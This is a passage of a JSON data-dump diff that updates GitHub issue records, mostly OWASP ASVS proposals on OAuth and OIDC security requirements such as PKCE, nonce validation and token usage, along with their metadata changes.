request.\r\n - This applies to OIDC. The nonce claim is a specific OIDC claim to bind an ID token to a client, to mitigate replay attacks. See here: https://openid.net/specs/openid-connect-core-1_0.html#IDToken\r\n5. Verify that relying parties ensure that the issuer URL they are using for the configuration request exactly matches the value of the issuer claim in the OpenID provider metadata document received by the relying party, and that this also exactly matches the iss claim value in ID tokens that are supposed to be from that issuer.\r\n - This applies to OIDC. From: https://openid.net/specs/openid-connect-discovery-1_0.html#Security. An attacker may attempt to impersonate an OpenID Provider by publishing a Discovery document that contains an issuer Claim using the Issuer URL of the OP being impersonated, but with its own endpoints and signing keys. This would enable it to issue ID Tokens as that OP, if accepted by the RP\r\n\r\n\r\nPlease let me know what you think and happy to discuss these further. More to come!\r\n", @@ -50797,21 +50801,22 @@ "sequence_id": 2309316842, "is_locked": false, "lock_reason": "", - "comments_count": 6, + "comments_count": 7, "closed_at": null, "created_at": "2024-05-22T00:10:38Z", - "updated_at": "2024-05-27T07:09:29Z", + "updated_at": "2024-09-20T10:20:27Z", "author": 815, "repository": 1166, "assignees": [ - 795, 315, - 815 + 815, + 795 ], "labels": [ + 300, 286, - 299, - 300 + 1121, + 299 ] } }, @@ -50820,7 +50825,7 @@ "pk": 1667, "fields": { "nest_created_at": "2024-09-11T22:07:18.145Z", - "nest_updated_at": "2024-09-11T22:07:18.145Z", + "nest_updated_at": "2024-09-20T17:40:27.269Z", "node_id": "I_kwDOAYyWqM6Jq1Qo", "title": "discussion OAuth/OIDC: accepted flows and grants", "body": "Current requirements are in https://github.com/OWASP/ASVS/blob/master/5.0/en/0x51-V51-OAuth2.md#v511-authorization-server\r\n\r\nFrom different discussion and comments, there have been recommendation which flows should be disallowed (e. g. password grant, implicit flow)\r\n\r\nIn https://github.com/OWASP/ASVS/issues/996#issuecomment-1858764702 I proposed to take step to the future and adapt OAuth 2.1, which means allowing only PKCE to be used.\r\n\r\n> In this context, it means - we just require everyone to use only PKCE flow for public OAuth clients (the so-called \"Standard Authorization Code flow\" is not good enough). It also disallows using implicit flow and password grants.\r\n\r\n---\r\n\r\nFrom @deleterepo in https://github.com/OWASP/ASVS/issues/1969 \"proposal 1\"\r\n\r\n> Verify that the Implicit Flow grant is not used or configured by the Authorization Server, as it is vulnerable to access token leakage and access token replay attacks.\r\n\r\nThis applies to both OAuth and OIDC. As per https://oauth.net/2/grant-types and https://datatracker.ietf.org/doc/html/draft-ietf-oauth-security-topics#name-implicit-grant. If preferred we can consolidate this with 51.1.6 about Resource Owner Password Credentials Grant, but it might make sense to make it a separate requirement to keep it granular, because these grants are vulnerable to different attacks that we are highlighting.\r\n\r\n---\r\n\r\nSo my proposal is, that we accepting only PKCE.\r\n\r\nQuestions to solve:\r\n\r\n * Is it worth mentioning, that the password grant and implicit flow are known to be insecure in a requirement text, or is a chapter text enough for that?\r\n * Is there any need to limit the scope for the requirement (accept only PKCE) - such as other flows are allowed in certain conditions?\r\n", @@ -50833,18 +50838,19 @@ "sequence_id": 2309706792, "is_locked": false, "lock_reason": "", - "comments_count": 7, + "comments_count": 8, "closed_at": null, "created_at": "2024-05-22T06:43:48Z", - "updated_at": "2024-07-18T20:09:40Z", + "updated_at": "2024-09-20T10:11:30Z", "author": 795, "repository": 1166, "assignees": [], "labels": [ + 300, 286, + 1121, 289, - 299, - 300 + 299 ] } }, @@ -50876,9 +50882,9 @@ 803 ], "labels": [ - 286, 294, - 300 + 300, + 286 ] } }, @@ -50911,8 +50917,8 @@ ], "labels": [ 288, - 292, - 322 + 322, + 292 ] } }, @@ -50921,7 +50927,7 @@ "pk": 1670, "fields": { "nest_created_at": "2024-09-11T22:07:25.781Z", - "nest_updated_at": "2024-09-17T17:16:53.146Z", + "nest_updated_at": "2024-09-22T18:28:59.487Z", "node_id": "I_kwDOAYyWqM6Q6dk9", "title": "Proposal/discussion: OIDC nonce claim requirement", "body": "As per the discussion in https://github.com/OWASP/ASVS/issues/1969, the nonce claim is a specific OIDC claim to bind an ID token to a client, to mitigate replay attacks. See here: https://openid.net/specs/openid-connect-core-1_0.html#IDToken \r\n\r\nWe can have a requirement such as this:\r\n\r\nVerify that the nonce parameter sent in the authorization request is included in the nonce claim of the issued ID token, and that the client ensures that the nonce claim value is equal to the original value sent in the authorization request.\r\n\r\n@elarlang ", @@ -50934,21 +50940,22 @@ "sequence_id": 2431244605, "is_locked": false, "lock_reason": "", - "comments_count": 9, + "comments_count": 15, "closed_at": null, "created_at": "2024-07-26T01:44:08Z", - "updated_at": "2024-09-17T09:49:04Z", + "updated_at": "2024-09-22T16:23:17Z", "author": 815, "repository": 1166, "assignees": [ + 813, 815, 795 ], "labels": [ - 286, + 300, 298, - 299, - 300 + 286, + 299 ] } }, @@ -50982,10 +50989,10 @@ 795 ], "labels": [ - 286, 295, - 299, - 300 + 300, + 286, + 299 ] } }, @@ -50994,23 +51001,23 @@ "pk": 1672, "fields": { "nest_created_at": "2024-09-11T22:07:31.936Z", - "nest_updated_at": "2024-09-18T18:21:01.708Z", + "nest_updated_at": "2024-09-20T17:40:32.499Z", "node_id": "I_kwDOAYyWqM6RDhEa", "title": "Proposal/discussion: OIDC requirement about ID token only being used to prove that the user has been authenticated (edit: a general requirement for allowing only intended usage for tokens)", "body": "Developers sometimes mix up ID tokens and access tokens, especially in first-party scenarios, such as the case where both the client and the resource server, such as an API, is under their control. Using the ID token to make authorization decisions is a security issue, as there is no mechanism that ties the ID token to the API. Thus if an attacker steals the ID token in this case, they can use it to act as a legitimate client and call the API. For access tokens, these can be \"sender constrained\", such that the access token is bound to a specific sender. If an access token is stolen, an attacker can't necessarily use it to access the API since the token can be bound to the original client that requested it.\r\n \r\nFrom https://oauth.net/2/access-tokens/:\r\n\r\n> Access tokens may be either \"[bearer tokens](https://oauth.net/2/bearer-tokens/)\" or \"sender-constrained\" tokens. Sender-constrained tokens require the OAuth client to prove possession of a private key in some way in order to use the access token, such that the access token by itself would not be usable.\r\n\r\nAnother way of looking at this is the audience claim for each token. For the ID token, the intended recipient is the client, whereas for the access token, it's the RS.\r\n \r\nThat's a lot to digest 🤢, but the requirement itself can be as simple as this:\r\nVerify that the ID token is only used to prove that the user has been authenticated, and is not accepted as an authorization token by the Resource Server.", "summary": "Clarify the distinction between ID tokens and access tokens to prevent security issues in first-party scenarios. Enforce that the ID token should solely verify user authentication and not be used for authorization decisions by the Resource Server. Ensure that access tokens are \"sender constrained\" to bind them to the original client, mitigating risks if they are compromised.", "hint": "To address the problem of ensuring that ID tokens are only used for authentication and not for authorization, the following steps can be taken:\n\n1. **Educate Developers**: Organize training sessions to explain the differences between ID tokens and access tokens, focusing on their intended uses. Use real-world examples to illustrate the consequences of mixing them up.\n\n2. **Review Existing Implementations**: Conduct a thorough review of current systems that implement OIDC and OAuth to identify where ID tokens may be improperly used for authorization purposes.\n\n3. **Establish Guidelines**: Create clear documentation that outlines best practices for token usage, explicitly stating that ID tokens should only be used for authentication and access tokens for authorization.\n\n4. **Implement Token Validation Logic**: Ensure that resource servers validate tokens properly, confirming that only access tokens are accepted for API calls. This involves checking the audience claim and ensuring it matches the expected resource server.\n\n5. **Use Token Scopes**: Define and implement scopes in access tokens to specify what resources and actions the client is authorized to perform, which helps enforce authorization rules.\n\n6. **Incorporate Sender-Constrained Tokens**: Where feasible, implement sender-constrained access tokens to enhance security and reduce the risk of token theft misuse.\n\n7. **Regular Security Audits**: Establish a routine process for security audits and code reviews to detect any misuse of ID tokens in production environments.\n\n8. **Logging and Monitoring**: Implement logging mechanisms for API calls that include token validation results, allowing for monitoring of any unauthorized access attempts or anomalies.\n\n9. **Feedback Loop**: Create a mechanism for developers to report issues or confusion about token usage, and use this feedback to continuously improve education and guidelines.\n\n10. **Stay Updated**: Keep abreast of the latest developments in OIDC and OAuth standards to ensure that practices remain current and security measures are enhanced as new threats emerge.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/2005", "number": 2005, "sequence_id": 2433618202, "is_locked": false, "lock_reason": "", "comments_count": 19, - "closed_at": null, + "closed_at": "2024-09-20T08:21:50Z", "created_at": "2024-07-27T20:35:03Z", - "updated_at": "2024-09-18T05:46:09Z", + "updated_at": "2024-09-20T08:21:50Z", "author": 815, "repository": 1166, "assignees": [ @@ -51019,10 +51026,10 @@ 795 ], "labels": [ - 286, - 299, 300, - 1121 + 286, + 1121, + 299 ] } }, @@ -51052,8 +51059,8 @@ "repository": 1166, "assignees": [], "labels": [ - 286, 300, + 286, 308 ] } @@ -51084,9 +51091,9 @@ "repository": 1166, "assignees": [], "labels": [ + 314, 286, - 287, - 314 + 287 ] } }, @@ -51118,9 +51125,9 @@ 813 ], "labels": [ - 286, 299, - 300 + 300, + 286 ] } }, @@ -51153,9 +51160,9 @@ 795 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -51164,7 +51171,7 @@ "pk": 1677, "fields": { "nest_created_at": "2024-09-11T22:07:44.742Z", - "nest_updated_at": "2024-09-18T18:21:04.826Z", + "nest_updated_at": "2024-09-22T06:42:31.657Z", "node_id": "I_kwDOAYyWqM6U78gk", "title": "V51 OAuth: Add OAuth verifications for token management", "body": "To address BCPs from https://datatracker.ietf.org/doc/html/draft-ietf-oauth-browser-based-apps#name-application-architecture-pa a suggestion is to add the following verifications. Note that this address (closes) #1963. \r\n\r\n\r\n## V51.1 Generic OAuth2 security\r\n\r\nVerify that tokens are only managed by nodes where it's strictly needed, in example avoid having tokens accessible for JavaScript frontends. (L1, L2, L3)\r\n\r\n\r\n## V51.2 Authorization Server\r\n\r\nVerify that all clients are confidential and configured to use strong client authentication methods, i. e. 'mTLS' or 'private-key-jwt'. Note that L1-L2 applications could also use client-secret authentication and allow public clients. (L3)\r\n\r\nVerify that all token requests requires client authentication and that only sender-constrained (Proof-of-Posession) access-tokens are issued, either using 'mTLS certifcate binding' or 'DPoP'. (L3)\r\n\r\n", @@ -51177,19 +51184,19 @@ "sequence_id": 2498742308, "is_locked": false, "lock_reason": "", - "comments_count": 15, + "comments_count": 20, "closed_at": null, "created_at": "2024-08-31T09:07:13Z", - "updated_at": "2024-09-18T14:04:01Z", + "updated_at": "2024-09-21T14:45:08Z", "author": 813, "repository": 1166, "assignees": [ 813 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -51222,9 +51229,9 @@ 813 ], "labels": [ - 286, 299, - 300 + 300, + 286 ] } }, @@ -51256,9 +51263,9 @@ 813 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -51267,7 +51274,7 @@ "pk": 1680, "fields": { "nest_created_at": "2024-09-11T22:07:52.961Z", - "nest_updated_at": "2024-09-18T18:21:06.856Z", + "nest_updated_at": "2024-09-22T20:25:15.212Z", "node_id": "I_kwDOAYyWqM6U8fkM", "title": "V51 OAuth: Add code and PKCE related verifications", "body": "The following verifications are suggested to address code+PKCE, note that the last three are from #1971 where the second has a minor modification, but are included here as well.\r\n \r\n## V51.2 Authorization Server\r\n\r\nVerify that codes are can only be used once and are valid for at most 10 minutes. (L1,L2,L3)\r\n\r\nVerify that grant type 'code' is always used together with PKCE and requires S256 as the code challenge method. (L1,L2,L3)\r\n\r\nVerify that if a Client sends a valid PKCE \"code_challenge\" parameter in the authorization request, the Authorization Server enforces the correct usage of \"code_verifier\" at the token endpoint. (L1,L2,L3)\r\n\r\nVerify that Authorization Servers are mitigating PKCE Downgrade Attacks by ensuring a token request containing a \"code_verifier\" parameter is accepted only if a \"code_challenge\" parameter was present in the authorization request. (L1,L2,L3)", @@ -51280,10 +51287,10 @@ "sequence_id": 2498885900, "is_locked": false, "lock_reason": "", - "comments_count": 34, + "comments_count": 39, "closed_at": null, "created_at": "2024-08-31T14:51:05Z", - "updated_at": "2024-09-18T05:57:42Z", + "updated_at": "2024-09-22T18:11:45Z", "author": 813, "repository": 1166, "assignees": [ @@ -51292,9 +51299,9 @@ 795 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -51326,9 +51333,9 @@ 813 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -51337,7 +51344,7 @@ "pk": 1682, "fields": { "nest_created_at": "2024-09-11T22:07:57.478Z", - "nest_updated_at": "2024-09-18T18:21:09.607Z", + "nest_updated_at": "2024-09-22T18:29:05.062Z", "node_id": "I_kwDOAYyWqM6U8ghk", "title": "V51 OAuth: Add verifications for Authorization Server client configuration ", "body": "The following verifications are suggested to address least privilege client configuration for the Authorization Server and to follow recommendations from https://oauth.net/2.1/ (not to use ROPC or Implicit flows). \r\n\r\nNote that not using the ROPC flow is addressed in 51.1.6, but if the verifications in this issue and in #2041 are added then 51.1.6 is included and could be replaced/removed.\r\n\r\n \r\n## V51.2 Authorization Server\r\n\r\nVerify that all clients are configured to only allow the required grant. Avoid reusing clients for different purposes (allowing e g both 'code' and 'client-credentials' for a given client). Note that the grants 'token' (Implicit flow) and 'password' (Resource Owner Password Credentials flow) should no longer be supported for any client. (L1, L2, L3)\r\n\r\nVerify that allowed scopes for each client asserts least privilege. (L1, L2, L3)\r\n", @@ -51350,18 +51357,17 @@ "sequence_id": 2498889828, "is_locked": false, "lock_reason": "", - "comments_count": 11, + "comments_count": 15, "closed_at": null, "created_at": "2024-08-31T15:01:13Z", - "updated_at": "2024-09-18T14:11:44Z", + "updated_at": "2024-09-22T15:02:34Z", "author": 813, "repository": 1166, "assignees": [], "labels": [ + 300, 286, - 298, - 299, - 300 + 299 ] } }, @@ -51370,7 +51376,7 @@ "pk": 1683, "fields": { "nest_created_at": "2024-09-11T22:07:59.513Z", - "nest_updated_at": "2024-09-14T18:40:46.650Z", + "nest_updated_at": "2024-09-22T18:29:06.766Z", "node_id": "I_kwDOAYyWqM6U8hGm", "title": "V51 OAuth: Add client verifications", "body": "The following verifications are suggested to address general client responsibilities.\r\n\r\n## V51.3 Client\r\n\r\nVerify that system integrations clients, service-to-service without (human) user interaction, are required to use the 'client-credentials' grant.\r\n\r\nVerify that clients used by (human) users are required to use the 'code' grant or, if considered more appropriate, the 'device_code' grant. Additional custom \"flows\", not known to be industry standard (preferably defined in RFCs), should be avoided.\r\n\r\nVerify that clients asserts least privilege in token requests, by minimizing the set of requested scopes or any other parameter that affects permissions.\r\n\r\nVerify that clients used by (human) users requires the users consent to initiate an authorization request. Note that the consent can be implicit or explicit, requires sufficient CSRF-protection and should (by default) request a minimal set of scopes.\r\n\r\n#### Notes\r\nNote that adding the second verification above and suggested verification for PKCE in #2041 covers the PKCE part of 51.2.2 and the other parts of 51.2.2 is OIDC which should not be part of OAuth2 verifications, so a suggestion is to remove 51.2.2 (given the scope discussion in #2039 and that PKCE verifications from #2041 are added).\r\n\r\nAlso note that if the scope will be defined as suggested in #2036 then 51.2.3 and 51.2.4 should be removed as they are not in that scope, or the scope need to include Resource indicators and RAR specs as well.", @@ -51383,20 +51389,19 @@ "sequence_id": 2498892198, "is_locked": false, "lock_reason": "", - "comments_count": 9, + "comments_count": 14, "closed_at": null, "created_at": "2024-08-31T15:07:17Z", - "updated_at": "2024-09-13T21:54:46Z", + "updated_at": "2024-09-22T17:57:38Z", "author": 813, "repository": 1166, "assignees": [ 813 ], "labels": [ + 300, 286, - 295, - 299, - 300 + 299 ] } }, @@ -51405,9 +51410,9 @@ "pk": 1684, "fields": { "nest_created_at": "2024-09-11T22:08:01.550Z", - "nest_updated_at": "2024-09-17T17:17:03.784Z", + "nest_updated_at": "2024-09-20T17:40:42.934Z", "node_id": "I_kwDOAYyWqM6U8iLZ", - "title": "V51 OAuth: Add resource server verifications (modify 51.3.1)", + "title": "V51 OAuth: Add resource server verifications (modify 51.4.1)", "body": "It is suggested to modify 51.3.1 and split in two verifications, one for all levels and one for L3 only, since sender-constrained access tokens are only a requirement in security profiles like FAPI and it is uncommon for L2 application to implement this. \r\n\r\n## V51.4 Resource Server\r\n\r\nVerify that if that if the client sends an sender-constrained access token, using Mutual TLS for OAuth 2 or OAuth 2 DPoP, then the Resource Server must verify accordingly (proof-of-possession). (L1, L2, L3)\r\n\r\nVerify that all Resource Servers requests requires sender-constrained access token validation using Mutual TLS for OAuth 2 or OAuth 2 DPoP. (L3)\r\n\r\n", "summary": "Modify section 51.3.1 to create two distinct verifications: one applicable to all levels and another specifically for Level 3, recognizing that sender-constrained access tokens are primarily a requirement in security profiles like FAPI and are rarely implemented by Level 2 applications. Ensure that the Resource Server validates sender-constrained access tokens when clients use Mutual TLS for OAuth 2 or OAuth 2 DPoP, thereby confirming proof-of-possession across all levels. Enforce that all Resource Server requests at Level 3 mandate sender-constrained access token validation through Mutual TLS for OAuth 2 or OAuth 2 DPoP.", "hint": "To address the problem of modifying verification steps for resource server verifications in OAuth, follow these possible steps:\n\n1. **Review Existing Documentation**: Examine the current specification for section 51.3.1 to understand the existing verifications for resource servers and identify areas for modification.\n\n2. **Identify Key Stakeholders**: Gather input from relevant stakeholders, including security experts, developers, and implementers of the OAuth protocol, to understand their perspectives on the proposed changes.\n\n3. **Define Requirements for Each Level**: Clearly outline the specific requirements for resource server verifications at each level (L1, L2, L3), focusing on the necessity of sender-constrained access tokens for different security profiles.\n\n4. **Draft New Verification Steps**: Create a draft of the modified verification steps, splitting the existing verification into two distinct parts—one applicable to all levels and another specific to L3.\n\n5. **Incorporate Mutual TLS and DPoP**: Ensure that the new verifications adequately address the requirements for Mutual TLS and DPoP, particularly focusing on proof-of-possession for sender-constrained access tokens.\n\n6. **Seek Feedback on Draft**: Distribute the draft to stakeholders for feedback, ensuring that it aligns with their needs and the overall goals of the OAuth protocol.\n\n7. **Revise Draft Based on Feedback**: Incorporate suggestions and make necessary revisions to the draft, ensuring clarity and comprehensiveness in the verification steps.\n\n8. **Conduct Testing Scenarios**: Develop testing scenarios to validate the effectiveness of the new verifications, ensuring they correctly enforce sender-constrained access tokens.\n\n9. **Finalize Documentation**: Prepare the final version of the modified verifications, ensuring it is clear, concise, and accurately reflects the new requirements for resource servers.\n\n10. **Publish and Communicate Changes**: Publish the updated documentation and communicate the changes to all relevant parties, ensuring that developers and implementers are aware of the new verification requirements.", @@ -51418,20 +51423,20 @@ "sequence_id": 2498896601, "is_locked": false, "lock_reason": "", - "comments_count": 3, + "comments_count": 4, "closed_at": null, "created_at": "2024-08-31T15:18:12Z", - "updated_at": "2024-09-17T07:06:42Z", + "updated_at": "2024-09-20T13:36:17Z", "author": 813, "repository": 1166, "assignees": [ 813 ], "labels": [ - 286, 295, - 299, - 300 + 300, + 286, + 299 ] } }, @@ -51463,9 +51468,9 @@ 813 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -51474,7 +51479,7 @@ "pk": 1686, "fields": { "nest_created_at": "2024-09-11T22:08:05.753Z", - "nest_updated_at": "2024-09-14T18:40:53.592Z", + "nest_updated_at": "2024-09-22T18:29:08.796Z", "node_id": "I_kwDOAYyWqM6U8jIL", "title": "V51 OAuth: Add new OIDC Authorization Server verifications ", "body": "The following verifications are suggested to be added to the proposed new OIDC chapter (see #2037).\r\n\r\n## Authorization Server\r\n\r\nVerify that well known industry standard Authorization Servers are used, preferably these services are certified and listed at https://openid.net/certification/#OPENID-OP-P. For L3 applications they should also be implement the FAPI security profile.\r\n\r\nVerify that only the grant types 'code', 'ciba' or 'id-token' are used. Note that FAPI 2.0 recommends 'code' over the OIDC Hybrid flow 'id-token code' (which was previously recommended in FAPI 1.0).\r\n\r\nVerify that all clients requiring access tokens are using the 'code' grant or, if needed for device flows, the 'ciba' grant.\r\n", @@ -51487,20 +51492,20 @@ "sequence_id": 2498900491, "is_locked": false, "lock_reason": "", - "comments_count": 2, + "comments_count": 4, "closed_at": null, "created_at": "2024-08-31T15:25:24Z", - "updated_at": "2024-09-13T21:20:02Z", + "updated_at": "2024-09-22T08:42:18Z", "author": 813, "repository": 1166, "assignees": [ 813 ], "labels": [ - 286, 295, - 299, - 300 + 300, + 286, + 299 ] } }, @@ -51509,33 +51514,33 @@ "pk": 1687, "fields": { "nest_created_at": "2024-09-11T22:08:07.819Z", - "nest_updated_at": "2024-09-18T18:21:11.734Z", + "nest_updated_at": "2024-09-19T06:49:03.297Z", "node_id": "I_kwDOAYyWqM6U8jdM", "title": "V51 OAuth: Add new OIDC Client verifications", "body": "The following verifications are suggested to be added for the client to the proposed new OIDC chapter (see #2037).\r\n\r\n\r\n## Client\r\n\r\nVerify that in addition to regular JWT validation, ID tokens are validated to have 'aud' equal to the client id and a short lifetime (e g 1 minute).\r\n\r\nVerify that if the 'id-token' grant is used then nonce validation must be performed on authorization respones.", "summary": "Add new verifications for OIDC clients in the proposed chapter. Ensure that ID tokens undergo validation to confirm that the 'aud' claim matches the client ID and that the tokens possess a short lifespan, ideally around one minute. Implement nonce validation for authorization responses when utilizing the 'id-token' grant type.", "hint": "To approach the problem of adding new OIDC client verifications, you can follow these steps:\n\n1. **Review Existing Documentation**: Understand the current specifications and implementation of OIDC (OpenID Connect) and JWT (JSON Web Tokens) validation to identify where the new verifications should be integrated.\n\n2. **Define Requirements**: Clearly outline the new verifications needed, focusing on the two main points: validating 'aud' in ID tokens and ensuring nonce validation for 'id-token' grants.\n\n3. **Gather Stakeholder Input**: Consult with stakeholders such as developers, security teams, and product managers to gather insights and implications of these new verifications on existing workflows.\n\n4. **Design Verification Logic**: Create a detailed design of how the new verifications will be implemented in the existing OAuth client architecture. This includes specifying the validation logic for 'aud' and nonce.\n\n5. **Update Codebase**: Modify the client codebase to incorporate the new validation checks. This may involve updating libraries or frameworks used for JWT and OIDC processing.\n\n6. **Create Test Cases**: Develop comprehensive test cases to cover various scenarios for the new verifications, including valid and invalid tokens, and responses for 'id-token' grants.\n\n7. **Implement Testing Framework**: Integrate these test cases into the existing testing framework or create a new one to ensure that the verifications are properly validated during development and deployment.\n\n8. **Conduct Code Review**: Have the code changes reviewed by peers to ensure quality, adherence to standards, and that the new verifications do not introduce vulnerabilities.\n\n9. **Deploy and Monitor**: Deploy the changes to a staging environment for further monitoring and testing, ensuring that the new verifications work as intended without breaking existing functionality.\n\n10. **Document Changes**: Update the project documentation to include the new verifications, explaining their purpose, implementation details, and any changes to the overall security posture of the OIDC client. \n\nThese steps will help ensure a systematic approach to integrating the new verifications into the OIDC client effectively and securely.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/2048", "number": 2048, "sequence_id": 2498901836, "is_locked": false, "lock_reason": "", - "comments_count": 7, - "closed_at": null, + "comments_count": 8, + "closed_at": "2024-09-19T05:11:13Z", "created_at": "2024-08-31T15:27:49Z", - "updated_at": "2024-09-18T14:27:16Z", + "updated_at": "2024-09-19T05:11:13Z", "author": 813, "repository": 1166, "assignees": [ 813 ], "labels": [ - 286, 295, - 299, - 300 + 300, + 286, + 299 ] } }, @@ -51567,9 +51572,9 @@ 813 ], "labels": [ + 300, 286, - 299, - 300 + 299 ] } }, @@ -51601,9 +51606,9 @@ 803 ], "labels": [ - 286, 294, - 300 + 300, + 286 ] } }, @@ -51635,9 +51640,9 @@ 803 ], "labels": [ - 286, 294, - 300 + 300, + 286 ] } }, @@ -51669,9 +51674,9 @@ 803 ], "labels": [ - 286, 294, - 300 + 300, + 286 ] } }, @@ -51705,10 +51710,10 @@ 795 ], "labels": [ - 286, 294, 296, - 300 + 300, + 286 ] } }, @@ -51738,8 +51743,8 @@ "repository": 1166, "assignees": [], "labels": [ - 286, 300, + 286, 301, 302 ] @@ -51773,10 +51778,10 @@ 795 ], "labels": [ - 286, - 299, + 1122, 300, - 1122 + 286, + 299 ] } }, @@ -51869,7 +51874,7 @@ "pk": 1698, "fields": { "nest_created_at": "2024-09-11T22:08:42.946Z", - "nest_updated_at": "2024-09-18T18:21:37.273Z", + "nest_updated_at": "2024-09-22T18:30:04.527Z", "node_id": "MDU6SXNzdWU0MDk3MTczNA==", "title": "Where is the content of this guide", "body": "As discussed at the OWASP Projects Mini-Summit in Cambridge?\n\nWasn't the idea to put the content here?\n", @@ -52227,7 +52232,7 @@ "pk": 1710, "fields": { "nest_created_at": "2024-09-11T22:09:01.317Z", - "nest_updated_at": "2024-09-18T18:21:40.921Z", + "nest_updated_at": "2024-09-22T18:30:08.805Z", "node_id": "MDU6SXNzdWUzNTQzODg0Mg==", "title": "Code to be restructured for more flexibility", "body": "Current script is not maintainable and does not ensure logical task separation.\nDivide and reorganize current code output functions using following structure:\nmain.py\n- output/\n |--- html5.py\n- formats/\n |--- json.py\n |--- yaml.py\n |--- xml.py\n- core/\n |--- config.py\n |--- git.py\n |--- log.py\n |--- staticanalysis.py\n |--- semanticanalysis.py\n- stats/\n |--- math.py\n |--- metrics.py\n |--- activitystat.py\n |--- commitstat.py\n |--- codestat.py\n |--- datastat.py\n |--- filestat.py\n |--- securitystat.py\n- utils/\n |--- utils.py\n |--- datetime.py\n |--- timezone.py\n |--- utils.py\n- etl/\n |--- linecode.py\n |--- authors.py\n |--- commits.py\n |--- extract.py\n |--- load.py\n |--- transform.py\n |--- verify.py\n", @@ -52397,7 +52402,7 @@ "pk": 1716, "fields": { "nest_created_at": "2024-09-11T22:09:14.030Z", - "nest_updated_at": "2024-09-18T18:21:48.392Z", + "nest_updated_at": "2024-09-22T18:30:17.807Z", "node_id": "I_kwDOARTYoM595Vmc", "title": "Removing the old C-code from pysapcompress with a port in Python", "body": "We've been informed by Max (xje4@xje4.dev) that he created a fully compatible TypeScript port of the SAP LZH and LZC algorithms which is way more readable than the original C code:\r\nhttps://sr.ht/~xje4/sapcomp/\r\n\r\nRegarding issues such as https://github.com/OWASP/pysap/issues/5 it should still be a goal to remove the old C-code from pysapcompress. Max is happy to answer questions regarding the algorithms and give insights.", @@ -52667,8 +52672,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 328 + 328, + 326 ] } }, @@ -52698,8 +52703,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 328 + 328, + 326 ] } }, @@ -52729,8 +52734,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 328 + 328, + 326 ] } }, @@ -52760,8 +52765,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 328 + 328, + 326 ] } }, @@ -52791,8 +52796,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 328 + 328, + 326 ] } }, @@ -52822,8 +52827,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 328 + 328, + 326 ] } }, @@ -52884,8 +52889,8 @@ "repository": 1177, "assignees": [], "labels": [ - 327, - 329 + 329, + 327 ] } }, @@ -53160,9 +53165,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 329, - 330 + 330, + 326 ] } }, @@ -53192,9 +53197,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 329, - 330 + 330, + 326 ] } }, @@ -53286,8 +53291,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 329, + 326, 334 ] } @@ -53318,8 +53323,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 328, + 326, 335 ] } @@ -53381,8 +53386,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 328, + 326, 335 ] } @@ -53469,8 +53474,8 @@ "repository": 1177, "assignees": [], "labels": [ - 327, - 336 + 336, + 327 ] } }, @@ -53625,8 +53630,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 334 + 334, + 326 ] } }, @@ -53656,9 +53661,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 329, - 330 + 330, + 326 ] } }, @@ -53688,8 +53693,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 334 + 334, + 326 ] } }, @@ -53753,9 +53758,9 @@ 829 ], "labels": [ - 326, + 334, 333, - 334 + 326 ] } }, @@ -53785,8 +53790,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 333 + 333, + 326 ] } }, @@ -53816,8 +53821,8 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 330 + 330, + 326 ] } }, @@ -53999,8 +54004,8 @@ 821 ], "labels": [ - 327, - 329 + 329, + 327 ] } }, @@ -54116,9 +54121,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 328, - 329 + 329, + 326 ] } }, @@ -54148,9 +54153,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 328, 329, + 326, 334 ] } @@ -54183,9 +54188,9 @@ 830 ], "labels": [ - 326, 328, 329, + 326, 334 ] } @@ -54216,9 +54221,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 328, 329, + 326, 334 ] } @@ -54251,9 +54256,9 @@ 831 ], "labels": [ - 326, 328, - 334 + 334, + 326 ] } }, @@ -54469,8 +54474,8 @@ 821 ], "labels": [ - 327, - 335 + 335, + 327 ] } }, @@ -54502,8 +54507,8 @@ 821 ], "labels": [ - 327, - 335 + 335, + 327 ] } }, @@ -54978,9 +54983,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, - 330, 334, + 330, + 326, 335 ] } @@ -55164,9 +55169,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 334, - 338 + 338, + 326 ] } }, @@ -55196,9 +55201,9 @@ "repository": 1177, "assignees": [], "labels": [ - 326, 329, - 330 + 330, + 326 ] } }, @@ -56011,7 +56016,7 @@ "pk": 1834, "fields": { "nest_created_at": "2024-09-11T22:12:46.910Z", - "nest_updated_at": "2024-09-18T19:11:20.770Z", + "nest_updated_at": "2024-09-22T20:26:21.824Z", "node_id": "I_kwDOANmWkc6PRx3N", "title": "Cross Site Scripting Lab 1", "body": "under field training, the cross site scripting 1 lab does not accept this payload even though it pops the alert\r\n\r\n``\r\n\r\nThank you!", @@ -56304,9 +56309,9 @@ 854 ], "labels": [ + 344, 340, - 343, - 344 + 343 ] } }, @@ -56339,8 +56344,8 @@ 850 ], "labels": [ - 340, - 345 + 345, + 340 ] } }, @@ -56373,9 